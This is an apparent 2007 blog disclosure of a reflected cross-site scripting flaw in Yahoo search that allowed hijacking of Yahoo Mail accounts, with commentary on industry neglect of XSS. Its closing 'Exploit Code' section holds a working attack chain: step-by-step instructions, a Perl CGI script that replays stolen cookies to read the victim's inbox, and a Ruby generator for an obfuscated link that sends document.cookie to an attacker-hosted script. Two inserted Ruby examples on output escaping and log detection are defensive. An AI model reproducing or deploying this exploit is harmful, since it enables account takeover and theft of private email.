- Critical cross-site scripting (XSS) defect in Yahoo services is discovered
- Proof of concept of exploit is included
- XSS bugs are on the rise because of web 2.0+
- The web industry is mostly negligent about dealing with XSS
XSS Defects
"I used to act dumb. That act is no longer cute." This is what the re-jailed Paris Hilton said to Barbara Walters from behind penis-painted bars last Sunday. And with these words, Paris demonstrated that she is smarter and has more class than the web sites you have come to rely on every day. This doesn't say much about Paris, but it says a hell of a lot about the billion-dollar companies that safeguard your data and identity.
Who else should be putting an end to the dumb act? How about Yahoo, the number one provider of email in the universe, with over 250 million users worldwide?
Every day, hundreds of defects known as "cross-site scripting," or XSS for short, are discovered on web sites. (This is not even counting all those that don't get disclosed.) And the peanut butter eating yahoos in Yahoo's development organization are not immune to coding up such so-called XSS bugs.
"Cross-site scripting" is the top security risk facing the web today. The biggest danger is that so few web sites actually care enough to guard against it; and those that do care like the big internet companies, e.g. Yahoo, Google, AOL, often make mistakes. And a single mistake can be devastating to vast numbers of users.
XSS Demonstration at Yahoo! Mail
Allow me to demonstrate how dangerous XSS can be. Let’s imagine you’re checking your Yahoo Mail and you see an interesting email, maybe one from a friend of yours or one that peddles medication for the enlargement of your ears. Inside the email is contained an innocuous-looking link that looks like a Yahoo search page, something like http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E.... You click on it... Now why the hell did you do that? You are now screwed.
That’s right: an attacker would now have complete access to your Yahoo account. All because you clicked on one link.
This is not fantasy. The simple code to take over anyone's Yahoo account is included at the bottom of this article. If you were to visit this naughty link, your web browser would show the last email in your inbox displayed on a web site that is not part of Yahoo. What the simple link does is allow a program to navigate through your email account pretending to be you and download emails onto the attacker's web site, allowing them to read all your conversations with iheartsanjaya3 you met on myspace.
But that's not all that could happen. The attacking program could obtain your entire address book, supplementing spammers' lucrative database of spam victims. And thanks to Yahoo's recent integration of instant messaging within its web-mail site, it could also send instant messages to your friends impersonating you. ("You wanna do what to me?!") Many of your online accounts would then become vulnerable as well, since the attacker would have access to your password-resetting emails; this potentially means access to your financial accounts. All other Yahoo services that you use are also at risk, including Yahoo Photos or Flickr.
Worst of all, the simple act of clicking that link could allow an attacker to automatically send emails or instant messages as you to all your contacts containing the very same link, thus rapidly spreading the attack through your social network in a devastating epidemic known in the industry as a "worm." Within hours, millions of users’ accounts could be compromised.
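To make the mechanism concrete from the defender's side, here is an added example (my own code, not Yahoo's and not part of the exploit below) of the bug class the link above abuses: a search page that reflects the "p" parameter into an HTML attribute. The host name, parameter name and page layout are assumptions for the demonstration. The vulnerable version lets a value beginning with "> close the attribute and the tag, so the rest of the value is parsed as new markup in the site's own origin; the hardened version escapes the value for the attribute context, which is the fix the Yahoo developers needed.

```ruby
# Added example (not from the original post): reflected XSS in an HTML
# attribute, shown vulnerable and hardened. Host, parameter and markup are
# assumptions for illustration, not Yahoo's code.
require 'cgi'
require 'uri'

# Pull the "p" parameter out of a request URL the way a CGI sees it
# (URL-decoded), so the value looks exactly as the browser sent it.
def query_param(url, name)
  query = URI.parse(url).query || ''
  pair = URI.decode_www_form(query).find { |k, _| k == name }
  pair ? pair[1] : ''
end

# VULNERABLE: the raw parameter is interpolated straight into an attribute.
# A value that starts with "> closes the attribute and the <input> tag, so
# whatever follows is parsed as new markup running in the site's origin.
def render_vulnerable(query)
  %(<input type="text" name="p" value="#{query}">)
end

# HARDENED: escape for the attribute context. CGI.escapeHTML turns " < > &
# (and ') into entities, so the attacker's characters stay inside the quoted
# value as plain text and the browser never sees a second tag.
def render_hardened(query)
  %(<input type="text" name="p" value="#{CGI.escapeHTML(query)}">)
end

# Structural check used here to show the difference: does the rendered
# fragment contain any element other than the single <input> we intended?
def injected_tag?(html)
  html.scan(/<\s*([a-z][a-z0-9]*)/i).flatten.map(&:downcase) != ['input']
end

# Constructed sample link in the same shape as the one described in the post
# (attribute break-out, then an element with an event handler); the handler
# body here is a harmless alert rather than the post's cookie-stealing code.
SAMPLE_LINK = 'http://search.example.com/web/advanced?ei=UTF-8&p=%22%3E%3Cimg%20src=14%20onerror=alert(1)%3E&y=Search'

if __FILE__ == $0
  q = query_param(SAMPLE_LINK, 'p')
  puts "decoded p:  #{q}"
  puts "vulnerable: #{render_vulnerable(q)}  injected? #{injected_tag?(render_vulnerable(q))}"
  puts "hardened:   #{render_hardened(q)}  injected? #{injected_tag?(render_hardened(q))}"
end
```

The point of the check is that no amount of filtering the input for "bad words" replaces encoding on output: the same value is stored either way, and only the attribute-context escaping decides whether the browser sees one <input> or an <input> followed by an attacker-controlled <img>.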
Web Developer Ignorance and Web Company Complacency
Given how painful a "cross-site scripting" attack can be, its acronym should have been "ASS" instead of "XSS". Yet the developers behind the web applications you use every day often do not know what they are or do not care.
Why don’t web sites care enough? Because on the surface these vulnerabilities do not jeopardize the security of the entire company and such hacks are not as glamorous as high-profile break-ins where millions of social security numbers are stolen. But in reality, an XSS defect can be just as devastating to a site’s user base and extremely traumatic to any single user whose identity and privacy are violated.
Web developers are not keeping up with the increasing risks. While awareness of the risks of XSS and other dangers such as "Cross-Site Request Forgery" (CSRF) is on the rise, there are still many key developers who have never heard of these errors. Blame lack of developer training. The fact is that no developer should be allowed to touch code for a web site without undergoing a thorough education in protecting users from XSS. But the current situation is that web companies assume that their developers are "smart" enough to guard against it. The reality is that this is not a question of smarts, but a question of education and code review process, which are lacking on the web today.
There are a number of disturbing trends that are making the problem worse. The first is the constant push for the integration of many web services behind a single login. Because web conglomerates such as Yahoo and Google offer so many services under one roof, the chance that at any given time someone has left unlocked any of hundreds of doors has reached unacceptable levels. The online privacy and security of users hang precariously on a deck of cards.
The second exacerbating trend is the world of "user-generated content" (UGC). In today’s web 2.0, users are often allowed to generate content for a web site that other users will see. It’s now very easy for hackers to find ways to implant malicious exploits in the pages of innocent viewers.
Yet another trend is that applications are moving from the desktop to the web, as exemplified by Google Docs & Spreadsheets.
Next steps
Will the situation improve? It's up to the web companies to train their web developers and to institute processes to make sure that web application vulnerabilities like XSS and CSRF don't endanger their users.
As for users, your online privacy and security are always at risk. At any given moment, you can lose both, through no fault of yours.
Exploit Code
An attack is frighteningly easy to carry out.
- You find a hosting company to run your Perl CGI script
- You install the code listed below on your web site
- You take the address that points to that CGI script and run it through the Ruby script included below in order to generate a link to Yahoo's XSS vulnerability
- You send out emails with that link to your best friend, or everyone on Yahoo if you're a loser and have no friends
Code to be hosted:
#!/usr/bin/perl
use CGI;
use CGI::Carp qw(fatalsToBrowser);
use URI::Escape;
use HTTP::Cookies;
use HTML::Entities;
use LWP::UserAgent;
$q = new CGI;
print "Content-type: text/html\n\n";
$cookies = uri_unescape($q->param('x'));
@cookies = split(/; /, $cookies);
$cj = HTTP::Cookies->new;
foreach $c (@cookies) {
    $c =~ /^([^=]+)=(.*)$/;
    $k = $1; $v = $2;
    $cj->set_cookie('', $k, $v, "/", "yahoo.com");
}
$ua = LWP::UserAgent->new;
$ua->cookie_jar($cj);
$ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4');
$r = $ua->simple_request(HTTP::Request->new(GET => "http://mail.yahoo.com/"));
$r->header('Location') =~ /https?:\/\/([^\/]+)/;
$host = $1;
$r = $ua->get("http://$host/ym/ShowFolder?rb=Inbox");
if (!($r->content =~ /<a[^>]+id="folderviewmsg0subjlink"[^>]+href="([^"]+)/is)) {
    $url = "http://$host/ws/mail/v1/formrpc?m=ListMessages&appid=YahooMailRC&fid=Inbox&transform-markup=remove-javascript&startMid=0&numMid=300&startInfo=0&numInfo=30&sortKey=date&sortOrder=down";
    $r = $ua->get($url);
    $r->content =~ /<url>\s*([^>]+)\s*/si;
    $r = $ua->get(decode_entities($1));
    $r->content =~ /<mid>(.+?)<\/mid>/si;
    $mid = $1;
    $url = "http://$host/ws/mail/v1/formrpc?m=GetMessage&appid=YahooMailRC&fid=Inbox&message(0)-mid=$mid&message(0)-enableWarnings=true&message(0)-expandCIDReferences=true&message(0)-blockImages=all&truncateAt=1024000&transform-markup=remove-javascript&wssid=yr7G07oSPsarq&r=0.655461233731633";
    $r = $ua->get($url);
    if ($r->content =~ /<url>\s*([^<]+)\s*/si)
    {
        $r = $ua->get(decode_entities($1));
    }
    if ($r->content =~ /<part[^>]+subtype="html"[^<]+<text>(.+?)<\/text/si) {
        print decode_entities($1);
    } elsif ($r->content =~ /<part[^>]+type="text"[^<]+<text>(.+?)<\/text/si) {
        print decode_entities($1);
    }
} else {
    $r = $ua->get("http://$host$1&PRINT=1");
    $r->content =~ /(<div id="message.+?<\/div>)\s*<script>/si;
    print $1;
}
Code to generate Yahoo XSS exploit link:
#!/usr/bin/ruby
PATH_TO_CGI_SCRIPT = 'http://yourhostingsite.com/scriptname.cgi'
x = %Q{
f=document.forms[0];f.method='POST';f.action='#{PATH_TO_CGI_SCRIPT}';f.x.value=document.cookie;f.submit()
}
s = %q{http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E%3Cimg%20src=14%20onerror=eval(String.fromCharCode(}
s += x.strip.split(//).map{|s|s[0]}.join(",")
s += %q{))%3E&y=Search&fr=yfp-t-501}
puts s
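The link generator above hides its JavaScript inside String.fromCharCode() so that the literal payload never appears in the URL, which is exactly what defeats naive "does the query contain <script>" filters. For the people on the other side of this, here is an added example (my own, not from the post) of what a web operations team can run over its access logs to catch that style of request: it URL-decodes each query parameter, expands any String.fromCharCode(...) back into the text it would produce, and then flags the usual signs of an injected handler. The log lines are constructed in Apache combined format with documentation IP addresses, and the obfuscated payload in them decodes to a harmless alert(1), not the cookie-stealing code from the post.

```ruby
# Added example (not from the original post): detection of obfuscated
# reflected-XSS attempts in web server access logs. Log lines are constructed
# samples; the signal list is an illustrative starting point, not a complete
# ruleset.
require 'cgi'

# Request line of an Apache/nginx style log entry: method, path, protocol.
LOG_RE = %r{"(?:GET|POST) (\S+) HTTP/\d\.\d"}

# Split a request path into decoded [name, value] pairs. Decoding happens
# after splitting so an encoded '&' or '=' inside a value stays in the value.
def decoded_params(request_path)
  query = request_path.split('?', 2)[1] || ''
  query.split('&').map do |pair|
    k, v = pair.split('=', 2)
    [CGI.unescape(k.to_s), CGI.unescape(v.to_s)]
  end
end

# Replace every String.fromCharCode(n, n, ...) with the text it would build,
# so the reviewer sees what an obfuscated handler actually runs.
def unhide_charcodes(text)
  text.gsub(/String\.fromCharCode\(\s*([\d\s,]+)\)/i) do
    Regexp.last_match(1).split(',').map { |n| n.strip.to_i.chr(Encoding::UTF_8) }.join
  end
end

# Signals checked against the de-obfuscated value, in priority order.
SIGNALS = {
  'attribute break-out followed by a tag' => /["']\s*>\s*</,
  'inline event handler'                  => /\bon[a-z]+\s*=/i,
  'eval or fromCharCode obfuscation'      => /\beval\s*\(|String\.fromCharCode/i,
  'script tag'                            => /<\s*script\b/i,
  'cookie access'                         => /document\.cookie/i,
}.freeze

# Returns { param_name => [signals_hit, de-obfuscated value] } for every
# parameter that triggered at least one signal; empty hash when clean.
def suspicious_params(request_path)
  findings = {}
  decoded_params(request_path).each do |name, value|
    visible = unhide_charcodes(value)
    hits = SIGNALS.select { |_, re| visible =~ re }.keys
    findings[name] = [hits, visible] unless hits.empty?
  end
  findings
end

# Scan log lines; returns [[client_ip, findings], ...] for flagged requests.
def scan_log(lines)
  lines.each_with_object([]) do |line, out|
    path = line[LOG_RE, 1] or next
    findings = suspicious_params(path)
    out << [line.split(' ').first, findings] unless findings.empty?
  end
end

# Constructed sample log: a normal search, an obfuscated attribute break-out
# whose fromCharCode payload decodes to alert(1), and a bare <script> probe.
SAMPLE_LOG = [
  '198.51.100.7 - - [10/Jun/2007:14:02:11 -0700] "GET /web/advanced?ei=UTF-8&p=ruby+cgi&y=Search HTTP/1.1" 200 5123',
  '198.51.100.9 - - [10/Jun/2007:14:03:45 -0700] "GET /web/advanced?ei=UTF-8&p=%22%3E%3Cimg%20src=14%20onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))%3E&y=Search HTTP/1.1" 200 5130',
  '203.0.113.4 - - [10/Jun/2007:14:05:02 -0700] "GET /web/advanced?ei=UTF-8&p=%3Cscript%3E HTTP/1.1" 200 5100',
].freeze

if __FILE__ == $0
  scan_log(SAMPLE_LOG).each do |ip, findings|
    findings.each do |param, (hits, visible)|
      puts "#{ip} param=#{param} signals=#{hits.join('; ')} value=#{visible.inspect}"
    end
  end
end
```

Running this is a detection control, not a fix: a hit in the log means the reflected parameter reached the server, and whether it executed depends entirely on the output encoding of the page that echoed it. The de-obfuscation step matters because the fromCharCode form carries no quotes, angle brackets or the word "cookie" in the raw URL; only after expansion does the handler body become visible to a pattern match.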
- Rarely Greys <rarely.greys at (Google's mail)>
ed78040f0e776700f79d918e5be76a0d0b932ec48a1b2c823577b88a9dcf446ee09003a4154e8d9a0d89b3630396136e3100235388c1c7dc51226e4692b2cbfc